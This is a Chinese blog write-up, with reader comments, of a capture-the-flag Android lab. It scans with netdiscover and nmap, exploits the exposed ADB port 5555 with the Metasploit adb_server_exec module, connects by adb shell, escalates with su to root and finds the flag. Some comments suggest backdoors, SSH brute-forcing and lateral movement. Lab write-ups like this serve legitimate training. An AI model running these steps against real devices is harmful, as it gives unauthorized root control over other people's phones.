AI智能摘要
你是否好奇如何在15分钟内攻破一个看似安全的Android系统?当大多数人还在为移动端安全测试头疼时,这个靶场实验却用四个简单步骤揭示了惊人漏洞:从网络扫描到利用ADB调试端口,最终直接获取root权限。本文将完整重现黑客如何通过5555端口长驱直入,让你掌握移动渗透测试的核心技法,揭开Android系统深藏不露的安全隐患。
— AI 生成的文章内容摘要
今天给大家分享一个简单的Android漏洞环境测试靶场。
按照惯例,思路应该是:
1.扫描IP、端口; 2.攻击 3.获取shell 4.找flag
首先,我们扫描一波找到它的IP,这时候用netdiscover,很简单,怎么用看上一篇文章
然后我们断定192.168.0.49应该是Android虚拟机的ip
在nmap一波,
nmap -p 1-65535 -A 192.168.0.49
我们看到他开通5555/8080/22000
22000是ssh
那我们看看8080,如图,发现并没有什么卵用。
这时候,我们要考虑,搞一波5555端口。随之google一下。发现真的可以好好利用一下。
在Android系统中,TCP的5555旨在允许通过Android调试桥(ADB)管理设备,这是一种Android SDK功能,允许开发人员轻松地与设备通信并在其上运行命令或完全控制它们。
use exploit/android/adb/adb_server_exec show options #看下如何配置 set rhosts 192.168.0.49 #设置靶机地址 set lhost 192.168.0.167 #设置本机地址 run
已经成功了,这时候我们需要下载adb链接工具
apt-get install adb adb connect 192.168.0.49:5555 adb shell
成功了链接后,尝试了一下,发现可以su到root下,一顿乱翻。
在root下,目录/data/root目录下发现了flag


安徽省芜湖市 1F
这靶机也太松了,5555直接暴露?🤔
四川省成都市 2F
su都能进root,安卓模拟器这么随便的?
湖北省武汉市 3F
adb调试模式不关,真实环境早被爆了
福建省三明市 4F
flag藏data目录算啥,能不能难一点
山东省 B1
@ 断墙哨兵 M1芯片跑Android模拟器确实容易抽风,建议用Intel模式试试
日本 B1
@ 断墙哨兵 data目录都快成flag养老区了,能不能换个新花样
澳大利亚 5F
之前搞过类似,翻了一堆目录才找到
广东省东莞市 B1
@ 红烧肉太香 我去,我之前搭环境也遇到5555连不上,结果防火墙没关
广东省广州市 6F
kali用得挺溜啊,msf那块讲得清楚
上海市 B1
@ 橡皮擦魔术师 msf那个模块现在还维护吗?怕不是老版本漏洞
湖南省长沙市 7F
22000是ssh端口,但为啥不去碰它?
台湾省 8F
netdiscover扫IP那段图真眼熟,老工具了
日本 B1
@ 云脑管理员 这不就是当年我踩的坑嘛,netdiscover扫完还得配合arp-scan补漏
湖北省武汉市 B1
@ 云脑管理员 那个netdiscover界面一看就是老渗透人的青春
日本 9F
这个配置在M1上能跑吗?想试试
黑龙江省牡丹江市 B1
@ 跑步达人 M1芯片上应该问题不大,不过可能得走虚拟机兼容模式
北京市 B1
@ 跑步达人 M1跑kali虚拟机卡成狗,根本没法试
台湾省 B1
@ 跑步达人 m1跑adb确实卡,我试过用虚拟机桥接网络勉强能连上
北京市 10F
flag找到了然后呢?后续还有别的玩法没?
贵州省六盘水市 B1
@ 光年 flag找到了然后升级权限搞持久化啊,难道不兴提权留后门?
香港 11F
翻了半天结果su直接进,这模拟器也太给面子了
广东省湛江市 12F
netdiscover这界面太经典了,看到就想起来以前熬夜打靶的日子
日本 13F
data目录藏flag?我上次在sdcard里找了三小时😭
湖南省长沙市 14F
5555开着就像把家门钥匙挂外头,真机谁敢这么搞
北京市 B1
@ 碧空孤雁 5555开着确实离谱,但靶场不这样咱们还打个啥
河南省平顶山市 15F
22000没利用上有点可惜,说不定能横向移动呢
河北省承德市 16F
adb shell一连就root,这权限也太豪横了吧
福建省泉州市 B1
@ 青峰 豪横到离谱,root权限说拿就拿
香港 17F
感觉这靶场是给新手练手的,老鸟估计十分钟刷完走人
印度尼西亚 18F
flag到手反而懵了,总感觉还有隐藏关卡没触发
陕西省西安市 19F
安卓调试桥真是一把双刃剑,方便和风险全在这一端口
浙江省 20F
netdiscover这工具用得是真顺手,扫一下立马出结果
上海市嘉定区 21F
adb直接getshell太爽了,我都忘了现在安卓还能这么玩
韩国 B1
@ 无人知晓 没想到这么快就能上root,真是意外惊喜
上海市 22F
root权限说给就给,这模拟器怕不是专门放水的吧
浙江省台州市 B1
@ 咕咚水桶 看到su直接回车进root我人都傻了😂
上海市 23F
flag藏data目录太常规了,能不能整点花活儿
日本 24F
之前试过类似环境,折腾半天发现漏了个端口,气死
北京市 25F
22000ssh没利用起来确实可惜,还以为能搞跳板呢
香港 26F
看到su直接进我都惊了,现在的靶机都这么友好?
江苏省常州市 27F
5555端口直接敞开,真的太随意了
安徽省合肥市 28F
我刚看到这篇,感觉像在玩儿儿童乐园
马来西亚 B1
@ 话痨的鹦鹉 童心未泯的感觉,还挺有意思的
日本 29F
这个adb的版本要怎么配合kali的?
浙江省台州市椒江区 30F
之前也折腾过adb,弄了半天才连上
湖北省武汉市 31F
flag直接藏data,稳得一批
日本 32F
其实nmap加上‑sV还能看到服务细节,省得再跑一次扫描
韩国 B1
@ 散步时光机 加了-sV确实省事,我上次漏扫后悔死了
吉林省松原市 33F
那如果把5555改成别的端口,还能这么直接root吗
河南省洛阳市偃师市 34F
我觉得把ssh端口留着不动手实在浪费资源,应该先尝试横向移动再说
天津市 35F
adb shell直接root,爽!
江苏省泰州市 36F
看完这篇,我直接笑出声 😂
辽宁省 37F
adb直接连上就root,这靶机是来送温暖的吧
云南省昆明市 B1
@ 志异录 这靶机怕不是专门给新人发福利的
韩国 38F
flag藏/data/root?真实环境早被删干净了
上海市奉贤区 39F
这靶场设置得,新手村友好度拉满了
韩国 40F
之前搭过类似环境,adb没开调试模式折腾半天
四川省德阳市 B1
@ 妖灵使 调试没开真的浪费时间,下次记得先打开
菲律宾 41F
5555端口裸奔,现实中早被挖矿木马占了
山西省吕梁市 42F
那如果关了adb调试还能这么轻松进吗?
北京市 43F
netdiscover扫出来一堆VMware,确定没扫错网段?
上海市 B1
@ 话痨の防护罩 netdiscover扫的是局域网,一堆VMware正常得很,你怕是没用过虚拟机嵌套
韩国 44F
ssh留着不用,纯属浪费,至少试试弱口令啊
澳大利亚 45F
netdiscover扫完直接上nmap -sV不更顺?
日本 46F
5555开着等于欢迎入侵,真机谁敢这么玩
贵州省贵阳市 47F
flag藏data也太明显了,能不能藏system里
广东省广州市 48F
m1跑adb有点卡,有人试过docker方案吗
四川省德阳市 49F
翻目录三小时结果su一下进去了气死
云南省楚雄州 50F
看到connect 192.168.0.49那刻我就笑出声hhh
新加坡 51F
ssh端口晾那儿不用,真的浪费机会啊
泰国 52F
这靶机也太给面子了吧,su一下就进root,真实环境做梦去吧
广西 53F
5555开着不关,等于大门敞开请人进来,这设定也太松了
广东省江门市新会区 54F
adb连上直接root,这权限给得太爽了吧,我都以为自己手抖打错IP了
福建省龙岩市 55F
翻了半小时目录结果flag就搁root底下,感觉像被安排得明明白白
湖北省鄂州市 56F
22000端口ssh晾着不用,至少爆破一下试试弱口令也好啊
印度 57F
之前搭环境adb调试没开,折腾半天才发现要手动启动服务
印度尼西亚 58F
nmap扫完就知道8080没用,还硬看?不如直接上adb试试
重庆市 59F
netdiscover这工具我用了一次就爱上了,扫IP又快又准
广东省东莞市 60F
关了adb调试当然不能这么进,不然厂商天天被渗透?
内蒙古呼和浩特市 61F
看到su直接进我都愣了,这模拟器是怕我们挫败感太强特意放水?
湖南省湘潭市雨湖区 62F
adb连上就能root也太草率了,真实设备哪敢这么玩
山东省威海市 B1
@ 外滩风云 哈哈,靶场嘛,图个方便
湖南省长沙市 63F
flag藏data太常规了,搞得我差点以为自己在写CTF模板
河北省石家庄市 64F
m1跑kali本来就吃力,adb再一开风扇狂转,体验感拉满